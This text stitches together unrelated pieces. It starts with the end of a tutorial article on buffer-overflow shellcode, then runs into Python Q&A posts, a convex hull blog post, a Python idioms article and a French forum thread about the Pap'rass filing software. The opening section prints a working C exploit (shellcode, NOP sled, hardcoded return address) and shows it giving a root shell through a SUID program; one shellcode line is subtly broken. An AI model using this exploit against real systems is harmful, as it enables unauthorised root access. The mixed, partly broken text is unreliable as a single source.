from /lib/libc.so.6...(no debugging symbols found)...done. Loaded symbols for /lib/libc.so.6 Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done. Loaded symbols for /lib/ld-linux.so.2 #0 0x61616161 in ?? () The segmentation fault happened at the address 0x61616161--which is the string aaaa in hexidecimal. This means that the exploit can get the program to jump to an arbitrary address depending on what it receives as a parameter. It would be nice to make it jump to the beginning of the local buffer on the stack--but what is the address of the stack right now? gdb knows: (gdb) info register esp esp 0xbffff334 0xbffff334 Now, the only other thing necessary to get the code to execute is the previously written shellcode. You can take the ready shell app and run an overflow victim program from it: #include <stdlib.h> static char shellcode[]= "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\" "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff/bin/sh#"; #define NOP 0x90 #define LEN 1024+8 #define RET 0xbffff334 int main() { char buffer[LEN]; int i; /* first fill up the buffer with NOPs */ for (i=0;i<LEN;i++) buffer[i] = NOP; /* and then the shellcode */ memcpy(&buffer[LEN-strlen(shellcode)-4],shellcode,strlen(shellcode)); /* and finally the address to return to */ *(int*)(&buffer[LEN-4]) = RET; /* run program with buffer as parameter */ execlp("./overflow","./overflow",buffer,NULL); return 0; } The shellcode[] symbol array contains the shellcode without any null bytes. It may differ slightly, depending on OS conditions. The main() function starts with a buffer that is the size of the local variable (1024 bytes) plus eight bytes for EBP and the return address. As the buffer is longer than the shellcode, the beginning needs a bunch of do-nothing machine code (NOP) operations. Then the function copies in the shellcode, and finally, the address of the beginning of the buffer. Now compile and run it: % gcc -o exploit exploit.c % ./exploit string is <lots of garbage> Yahoo! A new Bourne shell opened! This is, of course, not much fun as the overflow program runs as yourself, but if it were a SUID root program, then you would now have a root shell. Try that: % chmod +s overflow % su # chown root overflow # exit % ./exploit string is <lots of garbage> sh# whoami root That's it! You became a root user on this machine without permission. If the victim machine is a remote one, this will not help. More advanced shellcode creates a listening socket and redirects stdin and stdout to it before calling execve /bin/sh--that way, you don't need a shell account on the machine and can simply direct telnet or nc at the machine and port to get a root shell. In this article, I have reviewed the most important tricks that will be needed in writing shellcodes and using them in exploit. The key to success is a good understanding of the operating system under which the shellcode will run, as well as assembly programming. There is nothing complicated, though. It's also worth mentioning that you should only use these mentioned techniques for legal purposes and with the knowledge and consent of the machine's owner. Buffer Overflow Attacks Peter Mikhalenko works in Deutsche Bank as a business consultant. Return to the Linux DevCenter. Copyright © 2009 O'Reilly Media, Inc.
I have a string like so: "sometext #Syrup #nshit #thebluntislit" and i want to get a list of all terms starting with '#' I used the following code: import re line = "blahblahblah #Syrup #nshit #thebluntislit" ht = re.search(r'#\w*', line) ht = ht.group(0) print ht and i get the following: #Syrup I was wondering if there is a way that I could instead get a list like: [#Syrup,#nshit,#thebluntislit] for all terms starting with '#' instead of just the first term.
Is it possible for the __new__ method of a Python class A to refer to a (constant) instance of a subclass of A? To illustrate (motivate?) this question, below is a toy implementation of Lisp-like lists in Perl. A Lisp list is often defined recursively as a pair (aka cons) whose first element is some arbitrary Lisp object and whose second element is a list. To avoid an infinite recursion, Lisp has a sentinel constant called nil that is defined to be a list. Therefore, nil is a list, (cons 3 nil) is a list, (cons 3 (cons 1 nil)) is a list, etc. (although the last two examples are more commonly written as (3) and (3 1), respectively). The Perl implementation of this definition that I give below construes nil as being an instance of a subclass of list. Nevertheless, the definition of the list class refers to this nil constant. # list.pm use strict; BEGIN { sub list::nil (); } package _nil; { my $nil = bless \ do { my $x }, '_nil'; sub nil () { $nil; } } *car = *cdr = sub { shift }; our @ISA = ( 'list' ); package list; *nil = *_nil::nil; sub new { my $cls = shift; @_ ? bless [ shift, $cls->new( @_ ) ], $cls : nil; } sub car () { shift->[ 0 ] } sub cdr () { shift->[ 1 ] } use Exporter 'import'; our @EXPORT = qw( list nil ); 1; % perl -Mlist -e 'printf "nil->isa(\047list\047) = %s\n", \ nil->isa(q(list)) ? q(t) : q(f)' nil->isa('list') = t (car and cdr are Lisp-ish for the first and second element of the cons object.) The point of the example is to show that, in Perl (even my outdated Perl, at a well-below-expert level), it is trivial to implement a class that refers to an instance of a subclass. This is because, in Perl, a class B can be declared a subclass of A even before A has been defined. (This is what the line our @ISA = ( 'list' ); does.) I'm looking for some way to approximate this effect in Python. EDIT/clarification: Among the many things I've tried, here's one that hits close to the mark. from collections import namedtuple from itertools import chain class List(namedtuple('pair', 'car cdr')): def __new__(cls, *args): if len(args) > 0: return super(List, cls).__new__(cls, args[0], cls(*args[1:])) else: return nil def __str__(self): return '(%s)' % ' '.join(map(str, self)) def __iter__(self): return chain((self.car,), iter(self.cdr)) class Nil(object): car = cdr = property(lambda s: s) __str__ = lambda s: 'nil' def __iter__(self): if False: yield nil = Nil() print List(3, 4, 5) print nil, nil.car, nil.cdr print 'isinstance(nil, List) -> %s' % isinstance(nil, List) The output is: (3 4 5) nil nil nil isinstance(nil, List) -> False ...which is fine, except for the last line. If one changes the definition of Nil to start with class Nil(List) instead, then one gets the error: Traceback (most recent call last): File "list.py", line 38, in <module> nil = Nil() File "list.py", line 25, in __new__ return nil NameError: global name 'nil' is not defined
The simple approach to computing the convex hull in 2D. I’ve found myself coding convex hull algorithms on a few occasions now, so I decided to implement a few and talk about them here, in case someone new to the subject wants to get the quick ‘n’ dirty. The algorithms I will talk about are the Jarvis March (code), the Graham Scan (code) and Chan’s algorithm (code). I feel they are all different enough that each is worth looking at, but similar enough that they are worth looking at together. I will try and focus more on the actual implementation of the algorithms (all in Python), looking at potential pit falls as well as the niceties, rather then just rehashing what can be found on Wikipedia. This first post looks at the Jarvis March. Jarvis March The Jarvis March is probably the simplest convex hull algorithm conceptually. You start with an extreme point p (a vertex of the convex hull) of a point set. You then find the next point on the convex hull of the point set in CCW order. This is done by finding the “furthest right” point, relative to p. The furthest right point q, relative to p, is the point such all other points in the point set lie to the left of the directed line through p, q (this line lies on the hull boundary). We can then update p to q and repeat the process until we end up with the point we started at. The heart of the algorithm really lies in finding the furthest right point q, relative to an extreme point p. Say you have 3 points p, q and r. We say p, q, r form a left (respectively right) turn if r lies to the left (right) of the directed line through p and q. We can write a simple function to determine the turn of 3 points: TURN_LEFT, TURN_RIGHT, TURN_NONE = (1, -1, 0) def turn(p, q, r): """Returns -1, 0, 1 if p,q,r forms a right, straight, or left turn.""" return cmp((q[0] - p[0])*(r[1] - p[1]) - (r[0] - p[0])*(q[1] - p[1]), 0) Finding the furthest right point relative to p just reduces to simply finding the minimum point q using turn with a fixed parameter p as our comparison function. This can is done in \(O(n)\) time: def _next_hull_pt(points, p): """Returns the next point on the convex hull in CCW from p.""" q = points[0] != p and points[0] or points[1] for r in (x for x in points if x != p): if turn(p, q, r) == TURN_RIGHT: q = r return q The above function is simple, but it assumes the points are in general position; that there are no 3 collinear points. The first problem arises if there are 2 furthest right points, then we could chose the one that is closer to p, which is not an extreme point (ie. it lies on the hull boundary, but is not a vertex). This becomes a bigger problem if our first comparison relative to this “mid-point” is with the 2 vertices on either side of it. We could possibly “skip” over the furthest right point, since it is not to the right of the furthest left, but collinear and would end up with the incorrect furthest right point. Luckily, handling this is rather simple; we insist that if there is more than 1 furthest right point, we choose the one furthest from p. We can then rewrite our function, handling this case: def _dist(p, q): """Returns the squared Euclidean distance between p and q.""" dx, dy = q[0] - p[0], q[1] - p[1] return dx * dx + dy * dy def _next_hull_pt(points, p): """Returns the next point on the convex hull in CCW from p.""" q = p for r in points: t = turn(p, q, r) if t == TURN_RIGHT or t == TURN_NONE and _dist(p, r) > _dist(p, q): q = r return q The only problem now is finding the first extreme point. This can be done rather simply by choosing the minimum point in lexicographical order. We can then put this together and simply loop until we end up where we started: def convex_hull(points): """Returns the points on the convex hull of points in CCW order.""" hull = [min(points)] for p in hull: q = _next_hull_pt(points, p) if q != hull[0]: hull.append(q) return hull We will end up going through h iterations of the loop, where h is the number of points on the convex hull. Each iteration takes \(O(n)\) time to find the furthest right point, so the total time required is \(O(nh)\), which is suboptimal. However, it is important to remember that suboptimal does not mean it is useless. The Jarvis March can easily handle very large datasets in memory constrained environments. The only information you need to maintain between iterations is the first and last point found. Finding the next point scans through all points only once; order does not matter. These points could come from a database cursor, for instance. In this case, your function would return an iterator of the hull edges (or points) that generates them on demand, each time next() is called. You can also download the complete version of the code. Next post I’ll cover the Graham Scan.
I'm working on problem 401 in project euler, I coded up my solution in python but it's going to take a few days to run, obviously I'll need to speed it up or use a different approach. I came across a solution in Haskell that looks almost identical to my python solution but completes almost instantaneously. Can someone explain how it is so fast? (I AM NOT ASKING FOR HELP OR SOLUTIONS TO PROBLEM 401) divisors n = filter (\x -> n `mod` x == 0) [1..(n`div`2)] ++ [n] sigma2 n = sum $ map (\x -> x * x) (divisors n) sigma2big n = sum $ map (sigma2)[1..n] let s2b = sigma2big 10^15 putStrLn ("SIGMA2(10^15) mod 10^9 is " ++ (show (mod s2b 10^9))) From my understanding it is just using trial division to generate a list of divisors, squaring and summing them, and then summing the results from 1 to n. EDIT: forgot my python code from time import clock def timer(function): def wrapper(*args, **kwargs): start = clock() print(function(*args, **kwargs)) runtime = clock() - start print("Runtime: %f seconds." % runtime) return wrapper @timer def find_answer(): return big_sigma2(10**15) % 10**9 def get_divisors(n): divs = set() for i in range(1, int(sqrt(n)) + 1): if n % i == 0: divs.add(i) divs.add(n // i) return divs def sigma2(n): return sum(map(lambda x: x**2, get_divisors(n))) def big_sigma2(n): total = 0 for i in range(1, n + 1): total += sigma2(i) return total if __name__ == "__main__": find_answer()
This is pretty simple but I'd love a pretty, pythonic way of doing it. Basically, given a dictionary, return the subdictionary that contains only those keys that start with a certain string. » d = {'Apple': 1, 'Banana': 9, 'Carrot': 6, 'Baboon': 3, 'Duck': 8, 'Baby': 2} » print slice(d, 'Ba') {'Banana': 9, 'Baby': 2, 'Baboon': 3} This is fairly simple to do with a function: def slice(sourcedict, string): newdict = {} for key in sourcedict.keys(): if key.startswith(string): newdict[key] = sourcedict[key] return newdict But surely there is a nicer, cleverer, more readable solution? Could a generator help here? (I never have enough opportunities to use those).
This is a simple program that uses OpenCV (in Python) to import an image, convert it to grayscale and display it in a window. Then, when the user clicks a position in the window, a flood-fill is performed from that point. In addition, when the user clicks the point, the program should print the original 2D pixel value at that position. Unfortunately when too far to the right, OpenCV gives me an out of range error, although it works for most parts of the image. The flood fill itself is working properly at all x-y positions in the image. In working regions the output looks like this: mouse at: 70 , 84 Image Size (220, 186) cv2: (183.0, 0.0, 0.0, 0.0) pil im: 255 But then when I go too far to the right, the output looks like this: mouse at: 198 , 129 Image Size (220, 186) OpenCV Error: One of arguments' values is out of range (index is out of range) in cvGet2D print "cv2: " + str(cv2.cv.Get2D(cv2.cv.fromarray(gray), x, y)); cv2.error: index is out of range I tried converting the image to a PIL Image and use the Image.getpixel((x,y)) function, which worked in the sense that it didn't give me an out of range exception, but it unfortunately returns 255 at all x-y points (which is not the case). I tried switching the position of the x-y parameters in the OpenCV function call str(cv2.cv.Get2D(cv2.cv.fromarray(gray), x, y)) to str(cv2.cv.Get2D(cv2.cv.fromarray(gray), y, x)), and this got rid of the out of range error, but results in a spurious return of (255.0, 0.0, 0.0, 0.0) at all positions. Indeed, the tipping-point for this error, >186 in the x dimension, does happen to be the length of the y dimension. This is a major clue but does not solve the problem (my test image size is 220 x 186 as you can see above). import cv2 import cv import PIL.Image import numpy def main(): #mouse event handler flag CV_EVENT_LBUTTONDOWN = 1; #THE CODE AT ISSUE IS CONTAINED IN THIS MOUSEHANDLE FUNCTION def mouseHandle(event, x, y, flag, param): if (flag == 1): print "mouse is at: " + str(x) + " , " + str(y); pilim = Image.fromstring("L", cv.GetSize(cv2.cv.fromarray(gray)),cv2.cv.fromarray(gray).tostring()) print "Image Size " + str(cv.GetSize(cv.fromarray(gray))) print "cv2: " + str(cv2.cv.Get2D(cv2.cv.fromarray(gray), x, y)); print "pil im: " + str(pilim.getpixel((x,y))) cv2.floodFill(gray,mask,(x,y), (255,255,0),diff,diff) cv2.imshow('flood fill',gray) #THE CODE BELOW IS BASIC OPENCV STUFF TO LOAD THE IMAGE AND INITIATE MOUSECALLS #reads in the image im = cv2.imread('image.jpg') #converts it to grayscale gray = cv2.cvtColor(im,cv2.COLOR_BGR2GRAY) cv2.imshow('grayscale', gray) cv2.waitKey(0); # flood fill variables diff = (6,6,6) mask = zeros((h+2,w+2),uint8) # show the result in an OpenCV window, calling setMouseCallBack on mouse click cv2.imshow('flood fill',gray) cv2.setMouseCallback('flood fill', mouseHandle, CV_EVENT_LBUTTONDOWN) cv2.waitKey(0)
This article is intended for new users of Python. When going from one language to another, some things have to be unlearned (see Transfer of Learning). What you know from other languages may not be always useful in Python. This page contains some idioms used in Python that I particularly like, and I hope others find useful in their quest for Pythonicity. You need counters rarely, and iterators only occasionally Wrong: i = 0 while i<10: do_something(i) i += 1 Pythonic: for i in xrange(10): do_something(i) The following example indexes a list. Wrong: i = 0 while i<len(lst): do_something(lst[i]) i += 1 Pythonic: for item in lst: do_something(item) An iterator variable is useful when you want to maintain looping state between two 'runs': itr_lst = iter(lst) for item in itr_lst: do_something(item) if is_some_condition(item): break for item in itr_lst: # continues where previous loop left off do_something_else(item) You may not need that for loop Python provides many higher level facilities to operate on sequences, such as zip(), max(), min(), list comprehensions, generator expressions and so on. See Built-in Functions for these functions and more. Keep data in tuples, lists and dictionaries, and operate on entire collections for that fuzzy Pythonic feeling. For example, here is some code that reads a CSV file (with first row being the field names), converts each line into a dictionary record, and calculates the sum on the 'quantity' column: f = open('filename.csv') # f is an iterator field_names = f.next().split(',') # get the first item from the iterator using next() records = [dict(zip(field_names, line.split(','))) for line in f] # this will pull remaining lines print sum(int(record['quantity']) for record in records) Though a little naive (you should be using the csv module anyway, which is part of the Python Standard Library), this example demonstrates some useful features. Using zip() with dict() you can combine a tuple of field names with a tuple of values and make a dictionary - combine with list comprehensions you can do this to an entire list in one go. Tuples are not read-only lists Tuples usually indicate a heterogenous collection, for example (first_name, last_name) or (ip_address, port). Note that the type may be same (as in first_name and last_name may both be strings), but the real world meaning is usually different. You can think of a tuple as a row in a relational database - in fact the database row is even called a tuple in formal descriptions of the relational model. By contrast, a list of names is always a list, even though a particular function may not change it, that does not make it a tuple. Tuple unpacking is a useful technique to extract values from a tuple. For example: for (ip_address, port) in all_connections: if port<2000: print 'Connected to %s on %s' % (ip_address, port) Reading this code tells you that all_connections is a list (or iterable) contaning tuples of the form (ip_address, port). This is much clearer than using for item in all_connections and then poking inside item using item[0] or similar techniques. Unpacking is also useful while returning multiple values from a function: name, ext = os.path.splitext(filename) # split a file name into first part and extension Classes are not for grouping utility functions C# and Java can have code only within classes, and end up with many utility classes containing only static methods. A common example is a math functions such as sin(). In Python you just use a module with the top level functions. Say no to getter and setter methods Yes, encapsulation is important. No, getters and setters are not the only way to implement encapsulation. In Python, you can use a property to replace a member variable and completely change the implementation mechanism, with no change to any calling code. Functions are objects A function is a object that happens to be callable. This example sorts a list of dictionaries based on the value of 'price' key in the dictionaries: # define a function that returns useful data from within an object def get_price(ob): return ob['price'] lst.sort(key=get_price) # sort a list using the ['price'] value of objects in the list In the above case, you can also avoid defining the simple get_price() function and instead just generate the function using operator.itemgetter('price'). You can also use sorted(lst, key=get_price) to return a new list instead of modifying the list in-place. Related Links This article originally appeared at http://shalabh.infogami.com/Be_Pythonic2
I'm playing around with Tkinter and it works while I am asking just one input after another. Like 'askopenfilename'. But getting many pop-ups isn't so comfy. I would like to build just one Frame to take all inputs at once. And so far what I found is just the Frame with buttons (from some tutorials) to ask FileName or Directory, but I can't manage to be able to read the users choice. import Tkinter, Tkconstants, tkFileDialog class TkFileDialogExample(Tkinter.Frame): def __init__(self, root): Tkinter.Frame.__init__(self, root) # define buttons Tkinter.Button(self, text='askopenfilename', command=self.askopenfilename).pack() Tkinter.Button(self, text='askdirectory', command=self.askdirectory).pack() def askopenfilename(self): return tkFileDialog.askopenfilename() def askdirectory(self): return tkFileDialog.askdirectory() if __name__=='__main__': root = Tkinter.Tk() TkFileDialogExample(root).pack() root.mainloop() And that just builds the frame whith which I am ok, but it loops non stop and I am not able to get what the user have choosen. I have thought maybe I simply could get the value that comes with a function (since it is return) of a button? Should I necessary have to create an empty list, array, dic to store the values of functions like suggested here: Returning a value after calling a function with a button in Tkinter, which I haven't tried yet... Or is there other way, just to read it 'from the Buttons'?
anonym_user Re : Besoin de testeurs pour Pap'rass Salut, Excellente idée ce soft ! J'ai juste un petit problème : les doc ne se classe pas dans les chemises que je crée. Après chaque tentative de classement la recherche sur le classeur m'indique qu'il est vide. La recherche par mot clé retrouve le doc mais le document reste considéré comme non classé. Y a t-il quelque chose à configurer qui m'a échappé ? Je suis nouveau sur Ubuntu (Hardy) mais je deviens de plus en plus accroc. Encore quelques config et j'aurai presque tout ce dont j'ai besoin... Pardon, j'avais pas bien compris : il faut d'abord créer une chemise. On ne peut pas mettre le doc directement dans un classeur. Bon, je continue à tester, ça m'a l'air vraiment bien. Bon courage pour la poursuite du Dev...:) Celtiore Re : Besoin de testeurs pour Pap'rass Adopté ici aussi Super boulot, petite suggestion, la possibilité de choisir le repertoire de destination serait pour moi fantastique http://blog.celtiore.fr <- Mon Blog http://www.projetpos.fr <- Pour un Logiciel de Point de Vente Libre Hors ligne Celtiore Re : Besoin de testeurs pour Pap'rass bonjour, deuxième petite suggestion, possibilité de supprimer le document original lors d'un ajout, je suis entrain de reclasser tous mes documents, et je dois les effacer au fur et à mesure encore une fois, super boulot ps: concernant les tests, rien à dire pour le moment,j'utilise un scanner mustek 1200UB plus et tout fonctionne à merveille http://blog.celtiore.fr <- Mon Blog http://www.projetpos.fr <- Pour un Logiciel de Point de Vente Libre Hors ligne Celtiore Re : Besoin de testeurs pour Pap'rass Bonjour, en passant, d'autres petites suggestions, la possibilité de classer les chemises par ordre alphabétique et la sauvegarde de la configuration du scanner 'gray-color' ainsi que la résolution seraient les bienvenues ps concernant les tests, de temps en temps impossible de sortir en appuyant sur le bouton 'quitter', obligé de passer par la croix de la fenetre ... http://blog.celtiore.fr <- Mon Blog http://www.projetpos.fr <- Pour un Logiciel de Point de Vente Libre Hors ligne bipede Re : Besoin de testeurs pour Pap'rass Bonjour, en passant, d'autres petites suggestions, la possibilité de classer les chemises par ordre alphabétique et la sauvegarde de la configuration du scanner 'gray-color' ainsi que la résolution seraient les bienvenues ps concernant les tests, de temps en temps impossible de sortir en appuyant sur le bouton 'quitter', obligé de passer par la croix de la fenetre ... Bonjour, Quelle version utilises-tu ? La dernière (2.05) présente le plan de classement par ordre alphabétique dans le module de recherche, et sauvegarde les derniers paramètres utilisés pour le scanner... Le bouton "quitter" reste grisé tant qu'un module est ouvert... Pour le reste, je suis actuellement sur un projet qui me prend tout mon temps, et dès que celui-ci sera terminé je reviendrai étudier les améliorations proposées... A plus... Hors ligne Celtiore Re : Besoin de testeurs pour Pap'rass Bonjour, désolé mais j'etais avec la version 0.2 effectivement de grand changement depuis. http://blog.celtiore.fr <- Mon Blog http://www.projetpos.fr <- Pour un Logiciel de Point de Vente Libre Hors ligne piroucuments archivés par Re : Besoin de testeurs pour Pap'rass Bonjour, Excellent programme, mon scanner chauffe depuis hier soir . Est-il possible d'envisager une option d'envoi des documents archivés par mail ? Autre petite question : lorsque j'ai retrouvé mon document pourquoi suis-je obligé de faire un click droit sur celui-ci afin qu'il s'affiche dans la zone de droite ? Je pensais qu'un double click suffirait ! ( est-ce un problème qui vient de chez moi ou s'agit-il réellement du fonctionnement attendu ? ). Merci encore pour ce beau travail ! jacou18 Re : Besoin de testeurs pour Pap'rass Bonjour, J'ai installé Pap'rass sur mon micro avec tous les paquets complémentaires nécessaires. Je lance l'application sans problème, j'ai pu créer un plan de classement mais lorsque je veux ajouter un document pdf (ou odt), je sélectionne le fichier comme indiqué et le système reviens à l'écran Ajouter. Autre curiosité, dans le menu Configurer, le bouton Changer de thème est inactif. Je ne sais plus où chercher, quelqu'un aurait-il une piste ? Merci d'avance Hors ligne titi89 Re : Besoin de testeurs pour Pap'rass bonjour, @--->jacou18 tu as trouvé ? je viens de le telecharger et j'ai le même problême ne fonctionne pas sous jaunty? toutes les dependences sont installées @+ Hors ligne Celtiore Re : Besoin de testeurs pour Pap'rass Bonjour, voulant migrer mes documents sur un nas-343 D-link, j'ai remplacer le .paprass-data d mon home par un lien symbolique pointant sur le nouveau repertoire, mais a ma grande surprise le binaire se lance mais reste dans les choux, je n'arrive jamais a l'écran de paprass... ce que je vois depuis 'mount : 192.168.1.10:/mnt/HD_a2 on /home/celtiore804/Nas-1 type nfs (rw,user=root,noexec,nosuid,nodev,addr=192.168.1.10) depuis 'ls -al' du home : lrwxrwxrwx 1 celtiore804 celtiore804 42 2009-09-03 14:23 .paprass-data -> /home/celtiore804/Nas-1/Documents-Paprass/ et bien sur mon montage fonctionne sans aucun soucis, j'arrive à lire écrire etc... sur le nas merci de votre aide ... http://blog.celtiore.fr <- Mon Blog http://www.projetpos.fr <- Pour un Logiciel de Point de Vente Libre Hors ligne bipede Re : Besoin de testeurs pour Pap'rass Bonjour, J'ai installé Pap'rass sur mon micro avec tous les paquets complémentaires nécessaires. Je lance l'application sans problème, j'ai pu créer un plan de classement mais lorsque je veux ajouter un document pdf (ou odt), je sélectionne le fichier comme indiqué et le système reviens à l'écran Ajouter. Autre curiosité, dans le menu Configurer, le bouton Changer de thème est inactif. Je ne sais plus où chercher, quelqu'un aurait-il une piste ? Merci d'avance Bonjour jacou18 Peux-tu lancer paprass depuis un terminal ? puis tu ajoutes un document et tu me dis ce que dit le terminal... Hors ligne bipede Re : Besoin de testeurs pour Pap'rass Bonjour, voulant migrer mes documents sur un nas-343 D-link, j'ai remplacer le .paprass-data d mon home par un lien symbolique pointant sur le nouveau repertoire, mais a ma grande surprise le binaire se lance mais reste dans les choux, je n'arrive jamais a l'écran de paprass... ce que je vois depuis 'mount : 192.168.1.10:/mnt/HD_a2 on /home/celtiore804/Nas-1 type nfs (rw,user=root,noexec,nosuid,nodev,addr=192.168.1.10) depuis 'ls -al' du home : lrwxrwxrwx 1 celtiore804 celtiore804 42 2009-09-03 14:23 .paprass-data -> /home/celtiore804/Nas-1/Documents-Paprass/ et bien sur mon montage fonctionne sans aucun soucis, j'arrive à lire écrire etc... sur le nas merci de votre aide ... Lance paprass depuis un terminal, et dis-moi ce qu'il crache comme insulte... Hors ligne titi89 Re : Besoin de testeurs pour Pap'rass bonjour, je te met mon résultat dans le cas de tentative d'ajout de nouveau document thierry@thierry01:~/paprass-2.05$ python paprass.py (python:5430): Gtk-WARNING **: Impossible de trouver le moteur de thème dans module_path : « ubuntulooks » Traceback (most recent call last): File "paprass.py", line 2158, in Commencer self.Enregistrer(True, fichier, "non") File "paprass.py", line 2064, in Enregistrer dlgTxt = Enregistrer(GLOBVAR.app, mode, path) File "paprass.py", line 1968, in __init__ sizerButtons = self.CreateSeparatedButtonSizer(wx.OK|wx.CANCEL) AttributeError: 'Enregistrer' object has no attribute 'CreateSeparatedButtonSizer' thierry@thierry01:~/paprass-2.05$ @+ Hors ligne bipede Re : Besoin de testeurs pour Pap'rass @ titi_89 Ton problème est lié à la version de wxPython que tu as sur ta machine... Python bute sur la méthode CreateSeparatedButtonSizer() de la classe wx.Dialog() qui ne semble pas être implémentée dans ta version de wxPython (paquet python-wxgtkX.X où X.X représente le numéro de version). logiquement, en installant python-wxgtk2.8 tu ne devrais plus avoir le problème... Hors ligne titi89 Re : Besoin de testeurs pour Pap'rass bonjour, merci pour ta réponse mais c'est déjà installé ??? dans les paquets suggérés:tk8.4, tk8.3, tcsh, csh, octave3.0, mksh, pdksh ? @+ Hors ligne bipede Re : Besoin de testeurs pour Pap'rass bonjour, merci pour ta réponse mais c'est déjà installé ??? dans les paquets suggérés:tk8.4, tk8.3, tcsh, csh, octave3.0, mksh, pdksh ? @+ Tu es sous kubuntu ? Dans l'affirmative ça vient peut-être de là... Tu peux essayer avec cette version de laquelle j'ai remplacé toutes les occurrences de la méthode incriminée par une méthode plus classique... Hors ligne titi89 Re : Besoin de testeurs pour Pap'rass bonjour, merci pour ta réponse non je suis sous ubuntu 9.04 il y a de l'amélioration je peux ajouter un document mais si je veux le classer j'ai encore le même type de message: thierry@thierry01:~/paprass-2.06$ python paprass.py (python:17734): Gtk-WARNING **: Impossible de trouver le moteur de thème dans module_path : « ubuntulooks » Traceback (most recent call last): File "paprass.py", line 3527, in Classer self.panneau = Classement(self.conteneur) File "paprass.py", line 2868, in __init__ self.cla = AClasser(panel1, self) File "paprass.py", line 2646, in __init__ self.Rechercher() File "paprass.py", line 2761, in Rechercher self.SendSizeEvent() File "/usr/lib/python2.6/dist-packages/wx-2.6-gtk2-unicode/wx/_core.py", line 10174, in SendSizeEvent self.GetEventhandler().ProcessEvent(wx.SizeEvent((-1,-1))) AttributeError: 'AClasser' object has no attribute 'GetEventhandler' thierry@thierry01:~/paprass-2.06$ @+ Hors ligne bipede Re : Besoin de testeurs pour Pap'rass bonjour, merci pour ta réponse non je suis sous ubuntu 9.04 il y a de l'amélioration je peux ajouter un document mais si je veux le classer j'ai encore le même type de message:<metadata lang=Python prob=0.90 /> thierry@thierry01:~/paprass-2.06$ python paprass.py (python:17734): Gtk-WARNING **: Impossible de trouver le moteur de thème dans module_path : « ubuntulooks » Traceback (most recent call last): File "paprass.py", line 3527, in Classer self.panneau = Classement(self.conteneur) File "paprass.py", line 2868, in __init__ self.cla = AClasser(panel1, self) File "paprass.py", line 2646, in __init__ self.Rechercher() File "paprass.py", line 2761, in Rechercher self.SendSizeEvent() File "/usr/lib/python2.6/dist-packages/wx-2.6-gtk2-unicode/wx/_core.py", line 10174, in SendSizeEvent self.GetEventhandler().ProcessEvent(wx.SizeEvent((-1,-1))) AttributeError: 'AClasser' object has no attribute 'GetEventhandler' thierry@thierry01:~/paprass-2.06$ @+ Tu dois avoir un gros problème d'installation de wxPython... En tous cas, python trouve et utilise la version 2.6 alors que j'ai développé paprass avec la version 2.8. Je te conseille de désinstaller complètement le paquet python-wxgtk2.6 puis d'installer le paquet python-wxgtk2.8. Si tu as les deux paquets installés supprime la version 2.6 Hors ligne titi89 Re : Besoin de testeurs pour Pap'rass j'ai fait tout ce que tu as dit et tout fonctionne ajout de nouveau document,scanner,plan de classement etc... sauf le classement je vais jusqu'à sélectionner la chemise je valide et rien aucun document classé. aucun message dans le terminal j'ai vérifié avec 2.05 et 2.06 idem merci @+ Hors ligne bipede Re : Besoin de testeurs pour Pap'rass j'ai fait tout ce que tu as dit et tout fonctionne ajout de nouveau document,scanner,plan de classement etc... sauf le classement je vais jusqu'à sélectionner la chemise je valide et rien aucun document classé. aucun message dans le terminal j'ai vérifié avec 2.05 et 2.06 idem merci @+ Le document que tu as cherché à classer est toujours dans les documents à classer ? Hors ligne titi89 Re : Besoin de testeurs pour Pap'rass oui Hors ligne bipede Re : Besoin de testeurs pour Pap'rass oui Comment fais-tu pour classer ? Pap'rass exige trois niveaux dans l'arbre de classement : classeur > dossier dans le classeur > chemise dans le dossier. Tu ne peux donc mettre un document que dans une chemise, c'est à dire au niveau le plus bas du classement. Si tu choisis un élément situé au premier ou au deuxième niveau, rien ne se passe... Hors ligne titi89 Re : Besoin de testeurs pour Pap'rass oui j'ai bien une chemise en fait j'arrive à les classer maintenant j'ai refait une déinstallation complète de wxgtk...et réinstallé dans la fenêtre rechercher je les retrouve maintenant dans l'arborescence ou par une recherche mot clé mais le cadre de gauche reste toujours grisé à quoi est il censé servir? à afficher le document sélectionné? merci de ta patience. on s'approche. @+ Hors ligne bipede Re : Besoin de testeurs pour Pap'rass oui j'ai bien une chemise en fait j'arrive à les classer maintenant j'ai refait une déinstallation complète de wxgtk...et réinstallé dans la fenêtre rechercher je les retrouve maintenant dans l'arborescence ou par une recherche mot clé mais le cadre de gauche reste toujours grisé à quoi est il censé servir? à afficher le document sélectionné? merci de ta patience. on s'approche. @+ Le cadre de droite (pas de gauche) sert à afficher le document s'il s'agit d'une image. Pour afficher, clic droit sur la ligne du document et choisir dans le pop menu qui apparaît... Hors ligne titi89 Re : Besoin de testeurs pour Pap'rass merci bipede tout semble fonctionner maintenant plus qu'à tester excellent programme semble t'il je me permet juste une suggestion dommage que l'on ai pas un aperçu direct du document dans la fenêtre de droite après recherche ou selection.enfin c'est juste un avis personnel j'aimerais déjà bien être capable d'en faire autant. encore merci pour ta patience @+ Hors ligne
I am trying to insert values into database table using Python. I have connected to the database server and have gotten the INSERT INTO sql statement to work, however I cannot figure out how to insert values from a list into my database. I think my problem is simple, and just involves using the for-in loop correctly, but I do not know how to fix it. The line I need help with is "for i in cur: cur.execute("INSERT INTO Events2013 VALUES (i))")" Here is part of my code: import cx_Oracle import fileDb import g fileDb.loadTeams() fileDb.loadEvents() for event in g.eventList: print '%s, %s, %s' % (event.eventName, event.eventType, event.dates) dsn_tns = cx_Oracle.makedsn('hostname', 1521, 'orcl') con = cx_Oracle.connect('std15', 'std15', dsn_tns) cur = con.cursor() for i in cur: cur.execute("INSERT INTO Events2013 VALUES (i))") cur.execute("SELECT * FROM Events2013") for result in cur: print result cur.execute("COMMIT") cur.close() con.close()
